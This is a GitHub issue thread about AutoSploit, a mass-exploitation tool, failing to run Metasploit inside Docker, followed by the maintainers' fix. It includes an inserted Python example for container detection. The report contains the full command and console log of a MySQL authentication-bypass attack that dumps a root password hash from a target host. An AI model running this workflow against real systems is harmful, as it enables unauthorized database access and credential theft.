AutoSploit not executing msf commands in docker #1210

Closed
scmanjarrez opened this issue Nov 26, 2019 · 7 comments
Labels
enhancement New feature or request

scmanjarrez commented Nov 26, 2019

Running information

  • What branch did you download? Master
  • Clone, or docker run? Docker
  • What OS are you running? Kali GNU/linux rolling in host, Ubuntu 18.04.3 in docker

Exploit module information

  • What exploit was deployed? auxiliary-scanner-mysql-mysql_authbypass_hashdump
  • Was a session generated for the target? No
  • What version of metasploit are you running? Framework Version: 4.17.94-dev-0394a7b0d1 (the docker version)

Program information

  • Python version number? 2.7.15 (docker)
  • AutoSploit version number? Master
  • Any console output that is relevant to the issue: No output
  • Traceback (error) if any:
root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)
    
[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'sudo msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'

[+] **********RESULTS**********
[+] 	1 exploits run against 1 hosts.
[+] 	0 exploit successful (Check report.csv to validate!).
[+] 	0 exploit failed.
[+] 	Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s
[+] 	Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/report.csv

I have run AutoSploit in Docker and it isn't working correctly. You can see that exploiter.py is executing the command "sudo msfconsole ...". In the Docker machine there is no "sudo", so the execution fails. Then, "msfconsole" is not in PATH, so it won't work either.
After removal of "sudo"

sed -i 's/sudo //g' lib/exploitation/exploiter.py

and addition of msfconsole to PATH (or using --msf-path), it works flawlessly

export PATH=$PATH:/opt/metasploit-framework

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)
    
[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'
(msf)>> [*] Processing /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump for ERB directives.
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> workspace -a msf_autorun
(msf)>> [*] Added workspace: msf_autorun
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lhost 10.10.20.3
(msf)>> lhost => 10.10.20.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lport 2424
(msf)>> lport => 2424
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg verbose true
(msf)>> verbose => true
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg threads 20
(msf)>> threads => 20
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhost 10.10.0.3
(msf)>> [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
(msf)>> rhost => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhosts 10.10.0.3
(msf)>> rhosts => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> run -z
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 The server allows logins, proceeding with bypass test
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 10% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 20% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 30% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 40% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 50% complete
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully bypassed authentication after 588 attempts. URI: mysql://root:[email protected]:3306
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Hash Table has been saved: /root/.msf4/loot/20191126161722_msf_autorun_10.10.0.3_mysql.hashes_300774.txt
(msf)>> [*] Scanned 1 of 1 hosts (100% complete)
(msf)>> [*] Auxiliary module execution completed
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> exit -y
(msf)>> 

[+] **********RESULTS**********
[+] 	1 exploits run against 1 hosts.
[+] 	1 exploit successful (Check report.csv to validate!).
[+] 	0 exploit failed.
[+] 	Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s
[+] 	Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/report.csv

Meanwhile, I'm adding these workarounds to my entrypoint.sh.

Ekultek commented Nov 30, 2019

Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Ekultek commented Nov 30, 2019

@NullArray we could just add a --docker flag and if it's passed don't use the sudo keyword when executing the command. We could also check if the user is inside a docker container before executing just in case and if we determine they are we can either disallow them execution or automatically associate the flag as True. What do you think?

@scmanjarrez

> Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Correct, I'm trying to execute AutoSploit from a container without user input, using -e and -f arguments.

Ekultek commented Nov 30, 2019

@scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

scmanjarrez commented Nov 30, 2019

> @scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

It's OK for me to use the --docker flag. Right now I'm detecting if AutoSploit is running inside a Docker container, but it would be better to make it general so it'll work regardless of the container tool.

Ekultek commented Dec 2, 2019

> It's OK for me to use the --docker flag. Right now I'm detecting if AutoSploit is running inside a Docker container, but it would be better to make it general so it'll work regardless of the container tool.

Alright, I'll create a way to determine if we're inside a Docker container; that should make it more portable instead of creating a flag that will have to be passed.

Basically what I'll do is just check if we're inside a container; if we are, I'll get it to run without sudo. It'll be up to you to pass the path though (if needed).
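
The approach discussed in this thread, as an added example that is not AutoSploit's code and not the change in 03020fd: detect a container without depending on one runtime, drop the `sudo` prefix when it is unneeded, and resolve the tool from PATH plus extra directories. The function names and marker lists are assumptions, and it targets Python 3 (`shutil.which`), not the 2.7 interpreter in the report.

```python
import os
import shutil

# Substrings container runtimes commonly leave in /proc/1/cgroup (cgroup v1).
# Assumed list; extend it for other runtimes.
CGROUP_MARKERS = ("docker", "kubepods", "lxc", "containerd", "libpod")
# Marker files created by Docker and Podman respectively.
MARKER_FILES = ("/.dockerenv", "/run/.containerenv")


def in_container(cgroup_text=None, exists=os.path.exists):
    """Best-effort container check; inputs are injectable so it can be tested."""
    if any(exists(p) for p in MARKER_FILES):
        return True
    if cgroup_text is None:
        try:
            with open("/proc/1/cgroup") as fh:
                cgroup_text = fh.read()
        except OSError:
            return False
    # On cgroup v2 this file is often just "0::/", so only the marker
    # files above can identify the container there.
    return any(m in line for line in cgroup_text.splitlines()
               for m in CGROUP_MARKERS)


def privilege_prefix(euid, sudo_path, containerized):
    """Return the argv prefix needed to run a privileged tool."""
    if euid == 0 or containerized:
        return []                      # already root, or no sudo expected
    if sudo_path is None:
        raise RuntimeError("not root and sudo is not installed")
    return [sudo_path]


def resolve_tool(name, extra_dirs=()):
    """Find an executable on PATH plus caller-supplied directories."""
    search = os.pathsep.join([os.environ.get("PATH", "")] + list(extra_dirs))
    return shutil.which(name, path=search)


def build_argv(tool, args, extra_dirs=()):
    """Build an argv list (no shell) and fail early if the tool is missing."""
    path = resolve_tool(tool, extra_dirs)
    if path is None:
        raise FileNotFoundError("%s not found on PATH or in %r" % (tool, extra_dirs))
    prefix = privilege_prefix(os.geteuid(), shutil.which("sudo"), in_container())
    return prefix + [path] + list(args)
```

Failing early when the tool or `sudo` cannot be resolved avoids the silent "0 exploit successful, 0 exploit failed" result shown in the report.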

Ekultek added the enhancement label Dec 2, 2019
Ekultek pushed a commit that referenced this issue Dec 3, 2019
Ekultek commented Dec 3, 2019

Fixed via 03020fd; look for it in the next merge.

Ekultek closed this as completed Dec 3, 2019